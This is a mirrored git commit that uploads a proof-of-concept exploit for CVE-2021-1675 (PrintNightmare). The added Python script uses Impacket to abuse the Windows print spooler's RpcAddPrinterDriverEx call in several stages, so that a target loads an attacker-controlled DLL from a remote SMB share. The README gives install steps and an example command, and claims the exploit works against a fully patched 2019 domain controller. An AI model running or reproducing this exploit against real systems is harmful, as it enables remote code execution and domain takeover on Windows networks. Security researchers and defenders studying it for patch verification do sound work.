mirror of
https://github.com/cube0x0/CVE-2021-1675.git
synced 2024-12-22 10:46:32 +00:00
PoC upload
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
This commit is contained in:
parent
a18547eef4
commit
b94fddca41
3 changed files with 174 additions and 1 deletions
126
CVE-2021-1675.py
Normal file
126
CVE-2021-1675.py
Normal file
|
@ -0,0 +1,126 @@
|
|||
#!/usr/bin/python3
|
||||
from impacket.dcerpc.v5 import rprn
|
||||
from impacket.dcerpc.v5 import transport
|
||||
import argparse
|
||||
import sys
|
||||
|
||||
|
||||
def connect(username, password, domain, lmhash, nthash, address, port):
|
||||
binding = r'ncacn_np:{0}[\PIPE\spoolss]'.format(address)
|
||||
rpctransport = transport.DCERPCTransportFactory(binding)
|
||||
|
||||
rpctransport.set_dport(port)
|
||||
rpctransport.setRemoteHost(address)
|
||||
|
||||
if hasattr(rpctransport, 'set_credentials'):
|
||||
# This method exists only for selected protocol sequences.
|
||||
rpctransport.set_credentials(username, password, domain, lmhash, nthash)
|
||||
|
||||
print("[*] Connecting to {0}".format(binding))
|
||||
try:
|
||||
dce = rpctransport.get_dce_rpc()
|
||||
dce.connect()
|
||||
dce.bind(rprn.MSRPC_UUID_RPRN)
|
||||
except:
|
||||
print("[-] Connection Failed")
|
||||
sys.exit(1)
|
||||
print("[+] Bind OK")
|
||||
return dce
|
||||
|
||||
|
||||
def main(username, password, domain, lmhash, nthash, address, port, share):
|
||||
#connect
|
||||
dce = connect(username, password, domain, lmhash, nthash, address, port)
|
||||
|
||||
#build DRIVER_CONTAINER package
|
||||
container_info = rprn.DRIVER_CONTAINER()
|
||||
container_info['Level'] = 2
|
||||
container_info['DriverInfo']['tag'] = 2
|
||||
container_info['DriverInfo']['Level2']['cVersion'] = 3
|
||||
container_info['DriverInfo']['Level2']['pName'] = "1234\x00"
|
||||
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
|
||||
container_info['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00"
|
||||
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
|
||||
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00"
|
||||
|
||||
|
||||
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
|
||||
handle = "\\\\{0}\x00".format(address)
|
||||
filename = share.split("\\")[-1]
|
||||
|
||||
print("[*] Uploading {0}".format(share))
|
||||
|
||||
#stage 0
|
||||
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
||||
print("[*] Stage0: {0}".format(resp['ErrorCode']))
|
||||
|
||||
#stage 1
|
||||
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\{0}\x00".format(filename)
|
||||
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
||||
print("[*] Stage1: {0}".format(resp['ErrorCode']))
|
||||
|
||||
#stage 2
|
||||
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\2\\{0}\x00".format(filename)
|
||||
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
||||
print("[*] Stage2: {0}".format(resp['ErrorCode']))
|
||||
|
||||
#stage 3
|
||||
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\3\\{0}\x00".format(filename)
|
||||
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
|
||||
print("[*] Stage3: {0}".format(resp['ErrorCode']))
|
||||
|
||||
if (resp['ErrorCode'] == 0):
|
||||
print("[+] Exploit Completed")
|
||||
else:
|
||||
print("[-] Not Completed")
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
|
||||
Example;
|
||||
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll'
|
||||
""")
|
||||
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
|
||||
parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
|
||||
group = parser.add_argument_group('authentication')
|
||||
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
|
||||
group = parser.add_argument_group('connection')
|
||||
group.add_argument('-target-ip', action='store', metavar="ip address",
|
||||
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
|
||||
'This is useful when target is the NetBIOS name and you cannot resolve it')
|
||||
group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
|
||||
help='Destination port to connect to SMB Server')
|
||||
|
||||
if len(sys.argv)==1:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
options = parser.parse_args()
|
||||
|
||||
import re
|
||||
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
|
||||
options.target).groups('')
|
||||
|
||||
#In case the password contains '@'
|
||||
if '@' in address:
|
||||
password = password + '@' + address.rpartition('@')[0]
|
||||
address = address.rpartition('@')[2]
|
||||
|
||||
if options.target_ip is None:
|
||||
options.target_ip = address
|
||||
|
||||
if domain is None:
|
||||
domain = ''
|
||||
|
||||
if password == '' and username != '' and options.hashes is None:
|
||||
from getpass import getpass
|
||||
password = getpass("Password:")
|
||||
|
||||
if options.hashes is not None:
|
||||
lmhash, nthash = options.hashes.split(':')
|
||||
else:
|
||||
lmhash = ''
|
||||
nthash = ''
|
||||
|
||||
|
||||
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
|
BIN
Images/poc.png
Normal file
BIN
Images/poc.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 363 KiB |
49
README.md
49
README.md
|
@ -1,2 +1,49 @@
|
|||
# CVE-2021-1675
|
||||
Impacket implemenation of CVE-2021-1675
|
||||
|
||||
Impacket implementation of the [PrintNightmare ](https://github.com/afwu/PrintNightmare) PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)
|
||||
|
||||
Tested on a fully patched 2019 Domain Controller
|
||||
|
||||
Execute malicious DLL's remote or locally
|
||||
|
||||
![](Images/poc.png)
|
||||
|
||||
### Installation
|
||||
|
||||
Before running the exploit you need to install my version of Impacket and after that you're gucci
|
||||
|
||||
```
|
||||
git clone https://github.com/cube0x0/impacket
|
||||
cd impacket
|
||||
python3 ./setup.py install
|
||||
```
|
||||
|
||||
#### CVE-2021-1675.py
|
||||
|
||||
```
|
||||
usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share
|
||||
|
||||
CVE-2021-1675 implementation.
|
||||
|
||||
positional arguments:
|
||||
target [[domain/]username[:password]@]<targetName or address>
|
||||
share Path to DLL. Example '\\10.10.10.10\share\evil.dll'
|
||||
|
||||
optional arguments:
|
||||
-h, --help show this help message and exit
|
||||
|
||||
authentication:
|
||||
-hashes LMHASH:NTHASH
|
||||
NTLM hashes, format is LMHASH:NTHASH
|
||||
|
||||
connection:
|
||||
-target-ip ip address
|
||||
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
|
||||
and you cannot resolve it
|
||||
-port [destination port]
|
||||
Destination port to connect to SMB Server
|
||||
|
||||
Example;
|
||||
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue